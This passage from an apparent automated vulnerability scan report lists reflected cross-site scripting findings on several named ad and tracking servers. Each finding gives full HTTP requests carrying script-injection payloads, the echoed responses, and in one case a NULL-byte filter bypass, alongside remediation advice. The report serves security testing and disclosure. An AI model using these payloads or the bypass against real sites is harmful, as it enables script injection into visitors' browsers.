The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5798"><script>alert(1)</script>bbf67718b2e was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=1131!?che=344272482798721733&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060&redirect=a5798"><script>alert(1)</script>bbf67718b2e HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAOiUGABvUqUAAAAAAKWdKAAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAtPUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC28wb3QvquCrX4WZpQcY4wcHVfXnpzR4ctG.6oAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15j13o5q5%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320281%2FL%3D.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS%2FB%3D0F2xPtj8elw-%2FJ%3D1315313081109312%2FK%3DdHuXEgTLQ4cGOnShgI49sw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3D.mJTO0PDlB%255fpARpjTl.wjQAqMhd7ak5mFbgADqhS%26_salt%3D1652832779%26cb%3D1315313081109312%26i%3D140509%26r%3D0,02602a14-d886-11e0-8b21-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=657572620850510527; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:06 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BNJSAAAAABIBArwBATUBC%2FEB8AADAUIBB4ABQwEHgAFBAQeAAQK8fnhU7Shw8lB7AAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:06 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060&redirect=a5798"><script>alert(1)</script>bbf67718b2ehttp://ad.agkn.com/interaction!che=989082879?imid=8670815940544450683&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Product-and-Servi
...[SNIP]...

2.13. http://ads.media.net/medianet.php [size parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.media.net
Path:   /medianet.php

Issue detail

The value of the size request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71f42'%3balert(1)//acefc548551 was submitted in the size parameter. This input was echoed as 71f42';alert(1)//acefc548551 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /medianet.php?cid=7CU2PK0I5&size=300x25071f42'%3balert(1)//acefc548551&crid=712228940&ran=0.19952531741000712 HTTP/1.1
Host: ads.media.net
Proxy-Connection: keep-alive
Referer: http://shopping.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 12:45:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Content-Length: 6882
Connection: close
Content-Type: text/html; charset=UTF-8

<html><head></head><body style="margin: 0px; padding: 0px;">
<script language="javascript" type="text/javascript">
(function(){ var staticFrameUrl = 'http://srv.cdn-media.net/'; var requrl = '', fd = '', servingURL = 'http://search.keywordblocks.com/cmdynet?', kurl = '', cid = '7CU2PK0I5', size = '300x25071f42';alert(1)//acefc548551', crid = '712228940', widthx = '300', heighty = '25071f42';alert(1)//acefc548551';window._mN={};_mN._util={isAdProviderUrl:function(a){if(a==undefined||a==""){return false}return(_mN._sjc.providers.te
...[SNIP]...

2.14. http://ads.pointroll.com/PortalServe/ [r parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the r request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a17b3"%3balert(1)//1d7d4442f53 was submitted in the r parameter. This input was echoed as a17b3";alert(1)//1d7d4442f53 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1394840Y52120110823224152&time=2|12:45|-5&redir=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bW92NGptYihnaWQkYXkzOTlFU08yMlRwQVJwalRsLndqUXFiTWhkN2FrNW1GZEFBQW14USxzdCQxMzE1MzEzMTA0MTkzNTAxLHNpJDQ0NjMwNTEsdiQxLjAsYWlkJHRrcFc4VUplNXFBLSxjdCQyNSx5YngkUC5PSDNVZ1FtaGRTUV9HV1dQbFd3QSxyJDAscmQkMTZpNmRwbDFzKSk/1/*http://global.ard.yahoo.com/SIG=15kacfpj6/M=999999.999999.999999.999999/D=music/S=791000026:LREC/Y=YAHOO/EXP=1315320304/L=ay399ESO22TpARpjTl.wjQqbMhd7ak5mFdAAAmxQ/B=tkpW8UJe5qA-/J=1315313104251332/K=k1l.VZAYPvQ2T2sK4DlGjQ/A=3685707077155226847/R=0/X=6/*$CTURL$&r=0.34970951941795647a17b3"%3balert(1)//1d7d4442f53 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://new.music.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; PRvt=CBJ9xErENUwPwYAcUBBe; PRgo=BBBAAsJvBBVBF4FR; PRimp=43AC0400-C054-18FC-0309-F71007140101; PRca=|AKfq*9:2|AKcV*1774:3|#; PRcp=|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|GV12:2|GSur:3|#; PRpc=|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 06 Sep 2011 12:45:19 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache

document.write("<iframe id='profr1394840' src='http://ads.pointroll.com/PortalServe/?pid=1394840Y52120110823224152&cid=1512429&pos=h&redir=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0
...[SNIP]...
Y=YAHOO/EXP=1315320304/L=ay399ESO22TpARpjTl.wjQqbMhd7ak5mFdAAAmxQ/B=tkpW8UJe5qA-/J=1315313104251332/K=k1l.VZAYPvQ2T2sK4DlGjQ/A=3685707077155226847/R=0/X=6/*$CTURL$&time=2|12:45|-5&r=0.34970951941795647a17b3";alert(1)//1d7d4442f53&server=polRedir' width='300' height='250' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

2.15. http://ads.pointroll.com/PortalServe/ [redir parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd5d9"-alert(1)-"b85f3aab297 was submitted in the redir parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1394840Y52120110823224152&time=2|12:45|-5&redir=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bW92NGptYihnaWQkYXkzOTlFU08yMlRwQVJwalRsLndqUXFiTWhkN2FrNW1GZEFBQW14USxzdCQxMzE1MzEzMTA0MTkzNTAxLHNpJDQ0NjMwNTEsdiQxLjAsYWlkJHRrcFc4VUplNXFBLSxjdCQyNSx5YngkUC5PSDNVZ1FtaGRTUV9HV1dQbFd3QSxyJDAscmQkMTZpNmRwbDFzKSk/1/*http://global.ard.yahoo.com/SIG=15kacfpj6/M=999999.999999.999999.999999/D=music/S=791000026:LREC/Y=YAHOO/EXP=1315320304/L=ay399ESO22TpARpjTl.wjQqbMhd7ak5mFdAAAmxQ/B=tkpW8UJe5qA-/J=1315313104251332/K=k1l.VZAYPvQ2T2sK4DlGjQ/A=3685707077155226847/R=0/X=6/*$CTURL$bd5d9"-alert(1)-"b85f3aab297&r=0.34970951941795647 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://new.music.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; PRvt=CBJ9xErENUwPwYAcUBBe; PRgo=BBBAAsJvBBVBF4FR; PRimp=43AC0400-C054-18FC-0309-F71007140101; PRca=|AKfq*9:2|AKcV*1774:3|#; PRcp=|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|GV12:2|GSur:3|#; PRpc=|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 06 Sep 2011 12:45:18 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache

document.write("<iframe id='profr1394840' src='http://ads.pointroll.com/PortalServe/?pid=1394840Y52120110823224152&cid=1512429&pos=h&redir=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0
...[SNIP]...
99999.999999/D=music/S=791000026:LREC/Y=YAHOO/EXP=1315320304/L=ay399ESO22TpARpjTl.wjQqbMhd7ak5mFdAAAmxQ/B=tkpW8UJe5qA-/J=1315313104251332/K=k1l.VZAYPvQ2T2sK4DlGjQ/A=3685707077155226847/R=0/X=6/*$CTURL$bd5d9"-alert(1)-"b85f3aab297&time=2|12:45|-5&r=0.34970951941795647&server=polRedir' width='300' height='250' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

2.16. http://ads.pointroll.com/PortalServe/ [time parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the time request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d7cb"%3balert(1)//5a34bad3e0 was submitted in the time parameter. This input was echoed as 9d7cb";alert(1)//5a34bad3e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1394840Y52120110823224152&time=2|12:45|-59d7cb"%3balert(1)//5a34bad3e0&redir=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bW92NGptYihnaWQkYXkzOTlFU08yMlRwQVJwalRsLndqUXFiTWhkN2FrNW1GZEFBQW14USxzdCQxMzE1MzEzMTA0MTkzNTAxLHNpJDQ0NjMwNTEsdiQxLjAsYWlkJHRrcFc4VUplNXFBLSxjdCQyNSx5YngkUC5PSDNVZ1FtaGRTUV9HV1dQbFd3QSxyJDAscmQkMTZpNmRwbDFzKSk/1/*http://global.ard.yahoo.com/SIG=15kacfpj6/M=999999.999999.999999.999999/D=music/S=791000026:LREC/Y=YAHOO/EXP=1315320304/L=ay399ESO22TpARpjTl.wjQqbMhd7ak5mFdAAAmxQ/B=tkpW8UJe5qA-/J=1315313104251332/K=k1l.VZAYPvQ2T2sK4DlGjQ/A=3685707077155226847/R=0/X=6/*$CTURL$&r=0.34970951941795647 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://new.music.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; PRvt=CBJ9xErENUwPwYAcUBBe; PRgo=BBBAAsJvBBVBF4FR; PRimp=43AC0400-C054-18FC-0309-F71007140101; PRca=|AKfq*9:2|AKcV*1774:3|#; PRcp=|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|GV12:2|GSur:3|#; PRpc=|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 06 Sep 2011 12:45:16 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache

document.write("<iframe id='profr1394840' src='http://ads.pointroll.com/PortalServe/?pid=1394840Y52120110823224152&cid=1512429&pos=h&redir=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0
...[SNIP]...
usic/S=791000026:LREC/Y=YAHOO/EXP=1315320304/L=ay399ESO22TpARpjTl.wjQqbMhd7ak5mFdAAAmxQ/B=tkpW8UJe5qA-/J=1315313104251332/K=k1l.VZAYPvQ2T2sK4DlGjQ/A=3685707077155226847/R=0/X=6/*$CTURL$&time=2|12:45|-59d7cb";alert(1)//5a34bad3e0&r=0.34970951941795647&server=polRedir' width='300' height='250' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

2.17. http://adserver.teracent.net/tase/ad [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5c7a"><script>alert(1)</script>8352cc5bcec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tase/ad?AdBoxType=49&url=fidelity.yahoo.buttons&inv=yaptenc&adId=t_165052&CustomQuery=lineid%3D207575051%26position%3D1215986051%26site%3Dfinance.yahoo.com&esc=0&rnd=147582&rcu=http://global.ard.yahoo.com/SIG=15ussrhc9/M=601846039.602985816.859733051.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=odrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=3692525337737555437/R=0/X=3/*&a5c7a"><script>alert(1)</script>8352cc5bcec=1 HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/lookup?s=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; imp=a$le#1315313083608_171477072_ap3104_int|374#1315258459362_65704651_as3105_imp|; p161r=b$u-32#5.8GZ|g-yWB#1.8GZ|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1315313290665_68296156_as3105_imp|305#1315313290665_68296156_as3105_imp|374#1315258459362_65704651_as3105_imp|e2366%00%0d%0ae94350cc287#|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:48:10 GMT; Path=/tase
Set-Cookie: p161r=b$u-32#5.8GZ|g-yWB#1.8GZ|7e97a%00%0d%0a7815b11943f#.|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:48:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:48:10 GMT
Content-Length: 2600

<!DOCTYPE html>
<!-- Impression Id: 1315313290665_68296156_as3105_imp -->
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>

...[SNIP]...
.859733051.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=odrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=3692525337737555437/R=0/X=3/*&a5c7a"><script>alert(1)</script>8352cc5bcec=1http://adserver.teracent.net/tase/redir/1315313290665_68296156_as3105_imp?q=H4sIAAAAAAAAAFWQPW7DMAyFr0LK1F-qnZuNrkHiIxSRE6EeBUdOlSCybtgzVS3aoQsH8nsP77FPnyfvBBIXH2b3up1DiXXlMDkQQAJEZ1Br4jy5PQgEhUQSyNo
...[SNIP]...

2.18. http://adserver.teracent.net/tase/ad [rcu parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The value of the rcu request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b4ae"><script>alert(1)</script>c6801dc18e5 was submitted in the rcu parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tase/ad?AdBoxType=49&url=fidelity.yahoo.buttons&inv=yaptenc&adId=t_165052&CustomQuery=lineid%3D207575051%26position%3D1215986051%26site%3Dfinance.yahoo.com&esc=0&rnd=147582&rcu=http://global.ard.yahoo.com/SIG=15ussrhc9/M=601846039.602985816.859733051.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=odrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=3692525337737555437/R=0/X=3/*7b4ae"><script>alert(1)</script>c6801dc18e5 HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/lookup?s=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; imp=a$le#1315313083608_171477072_ap3104_int|374#1315258459362_65704651_as3105_imp|; p161r=b$u-32#5.8GZ|g-yWB#1.8GZ|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1315313290345_68345684_as3104_imp|305#1315313290345_68345684_as3104_imp|374#1315258459362_65704651_as3105_imp|f5d4d72fe77543f7c2420cd7#|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:48:10 GMT; Path=/tase
Set-Cookie: p161r=b$u-32#5.8GZ|g-yWB#1.8GZ|f5d4d72f11f08cc6d748514#.|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:48:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:48:09 GMT
Content-Length: 2576

<!DOCTYPE html>
<!-- Impression Id: 1315313290345_68345684_as3104_imp -->
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>

...[SNIP]...
6.859733051.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=odrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=3692525337737555437/R=0/X=3/*7b4ae"><script>alert(1)</script>c6801dc18e5http://adserver.teracent.net/tase/redir/1315313290345_68345684_as3104_imp?q=H4sIAAAAAAAAAFVQu3LDMAz7FVLWM9XQjZt9XXuJP6GtnOjiUefIqZKLrG_rn5XtdemCAQQBkO_56zl6ENBZoZ0yqA3F6YeQAkRnUShJZf1PjMYxGqfGNAlANZZHo
...[SNIP]...

2.19. http://beacon.partners-z.com/yre/20100908/b [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://beacon.partners-z.com
Path:   /yre/20100908/b

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 93b5d<script>alert(1)</script>db9aaf04338 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /yre/2010090893b5d<script>alert(1)</script>db9aaf04338/b?uuid=3c7f76504307f88c4e126d344670b7cc&prid=dcd1ff2f79f8a83b9c960316c4f85cf1&price=&lid=2124552455,2125516156,89336147,31505014,72516437,72538384,2125075536,79497737,2125160035,2124842339&p=10010&page=search& HTTP/1.1
Host: beacon.partners-z.com
Proxy-Connection: keep-alive
Referer: http://realestate.yahoo.com/search/New_York/New_York/homes-for-sale?typeBak=realestate&p=10010&type=classified&priceLow=&priceHigh=&bedroomLow=&bathroomLow=&search=Search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
X-Cascade: pass
Content-Type: text/plain
Content-Length: 67
Date: Tue, 06 Sep 2011 12:49:57 GMT

Not Found: /yre/2010090893b5d<script>alert(1)</script>db9aaf04338/b

2.20. http://beacon.partners-z.com/yre/20100908/b [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://beacon.partners-z.com
Path:   /yre/20100908/b

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload fb9e5<script>alert(1)</script>37006748ec was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /yre/20100908/bfb9e5<script>alert(1)</script>37006748ec?uuid=3c7f76504307f88c4e126d344670b7cc&prid=dcd1ff2f79f8a83b9c960316c4f85cf1&price=&lid=2124552455,2125516156,89336147,31505014,72516437,72538384,2125075536,79497737,2125160035,2124842339&p=10010&page=search& HTTP/1.1
Host: beacon.partners-z.com
Proxy-Connection: keep-alive
Referer: http://realestate.yahoo.com/search/New_York/New_York/homes-for-sale?typeBak=realestate&p=10010&type=classified&priceLow=&priceHigh=&bedroomLow=&bathroomLow=&search=Search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
X-Cascade: pass
Content-Type: text/plain
Content-Length: 66
Date: Tue, 06 Sep 2011 12:49:59 GMT

Not Found: /yre/20100908/bfb9e5<script>alert(1)</script>37006748ec

2.21. http://comcast-www.baynote.net/baynote/tags3/guide/results-xsl/comcast-www [elementIds parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://comcast-www.baynote.net
Path:   /baynote/tags3/guide/results-xsl/comcast-www

Issue detail

The value of the elementIds request parameter is copied into the HTML document as plain text between tags. The payload %00ee062<script>alert(1)</script>6f2ae7bb9cf was submitted in the elementIds parameter. This input was echoed as ee062<script>alert(1)</script>6f2ae7bb9cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /baynote/tags3/guide/results-xsl/comcast-www?userId=6923713561343025788&customerId=comcast&code=www&id=1&query=xss&url=http%3A%2F%2Fsitesearch.comcast.com%2F%3Fq%3Dxss%26cat%3Dcom%26con%3Dwww%26sec%3D%26PageName%3DLooking%252Bfor%2BProducts%2Band%2BPrices%253F&appendParams=&rankParam=&condition=d%26g%26s&elementIds=com_search_rightrail_b%00ee062<script>alert(1)</script>6f2ae7bb9cf&v=1 HTTP/1.1
Host: comcast-www.baynote.net
Proxy-Connection: keep-alive
Referer: http://sitesearch.comcast.com/?q=xss&cat=com&con=www&sec=&PageName=Looking%2Bfor+Products+and+Prices%3F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: BNServer
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=ISO-8859-1
Content-Length: 156
Date: Tue, 06 Sep 2011 12:22:28 GMT


bnTagManager.getTag(1).divId = "com_search_rightrail_b.ee062<script>alert(1)</script>6f2ae7bb9cf";
bnResourceManager.registerResource("GLResults1");

2.22. http://comcastresidentialservices.tt.omtrdc.net/m2/comcastresidentialservices/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://comcastresidentialservices.tt.omtrdc.net
